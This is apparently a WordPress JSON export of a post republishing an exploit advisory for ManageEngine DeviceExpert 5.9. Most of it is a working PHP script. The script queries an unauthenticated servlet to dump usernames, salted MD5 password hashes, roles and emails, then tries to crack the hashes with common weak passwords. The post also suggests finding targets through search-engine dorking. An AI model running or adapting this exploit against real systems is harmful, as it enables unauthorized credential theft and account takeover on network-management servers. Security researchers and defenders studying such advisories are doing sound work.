====================================================================================================================================
| # Title : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https:\/\/manageengine.com\/ |
====================================================================================================================================<\/p>\n
poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] This PHP COde extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.<\/p>\n[+] LIne 87 set your targer .<\/p>\n[+] usage : C:\\www\\test>php 3.php<\/p>\n[+] Payload :<\/p>\n
<?php
class ManageEngineDeviceExpert {
private $host;
private $port;
private $ssl;<\/p>\n
public function __construct($host, $port = 6060, $ssl = true) {
$this->host = $host;
$this->port = $port;
$this->ssl = $ssl;
}<\/p>\n
private function sendRequest($path) {
$url = ($this->ssl ? ‘https:\/\/’ : ‘http:\/\/’) . $this->host . ‘:’ . $this->port . $path;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}<\/p>\n
public function getUsers() {
echo “Reading users from master…\\n”;
$response = $this->sendRequest(‘\/ReadUsersFromMasterServlet’);
if (!$response) {
echo “Connection failed\\n”;
return null;
}
if (strpos($response, ‘<discoverydata>’) !== false) {
preg_match_all(‘\/<discoverydata>(.*?)<\\\/discoverydata>\/’, $response, $matches);
echo “Found ” . count($matches[0]) . ” users\\n”;
return $matches[0];
} else {
echo “Could not find any users\\n”;
return null;
}
}<\/p>\n
public function parseUserData($user) {
if (!$user) return null;<\/p>\n
preg_match(‘\/<username>([^<]+)<\\\/username>\/’, $user, $username);
preg_match(‘\/<password>([^<]+)<\\\/password>\/’, $user, $encoded_hash);
preg_match(‘\/<userrole>([^<]+)<\\\/userrole>\/’, $user, $role);
preg_match(‘\/<emailid>([^<]+)<\\\/emailid>\/’, $user, $email);
preg_match(‘\/<saltvalue>([^<]+)<\\\/saltvalue>\/’, $user, $salt);<\/p>\n
$hash = base64_decode($encoded_hash[1]);
$password = null;<\/p>\n
$weak_passwords = [‘12345’, ‘admin’, ‘password’, $username[1]];
foreach ($weak_passwords as $weak_password) {
if (md5($weak_password . $salt[1]) == bin2hex($hash)) {
$password = $weak_password;
break;
}
}<\/p>\n
return [
‘username’ => $username[1],
‘password’ => $password,
‘hash’ => bin2hex($hash),
‘role’ => $role[1],
’email’ => $email[1],
‘salt’ => $salt[1]];
}<\/p>\n
public function run() {
$users = $this->getUsers();
if (!$users) return;<\/p>\n
foreach ($users as $user) {
$user_data = $this->parseUserData($user);
if (!$user_data) continue;<\/p>\n
echo “User: ” . $user_data[‘username’] . “\\n”;
echo “Password: ” . ($user_data[‘password’] ? $user_data[‘password’] : ‘Not found’) . “\\n”;
echo “Hash: ” . $user_data[‘hash’] . “\\n”;
echo “Role: ” . $user_data[‘role’] . “\\n”;
echo “Email: ” . $user_data[’email’] . “\\n”;
echo “Salt: ” . $user_data[‘salt’] . “\\n”;
echo “—————————-\\n”;
}
}
}<\/p>\n
\/\/ \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0643\u0644\u0627\u0633
$deviceExpert = new ManageEngineDeviceExpert(‘127.0.0.1’);
$deviceExpert->run();
?><\/p>\n
Greetings to :==================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |
================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"
====================================================================================================================================| # Title : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https:\/\/manageengine.com\/ |==================================================================================================================================== poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] This PHP COde extracts …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59742","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59742","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59742"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59742\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59742"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59742"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59742"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}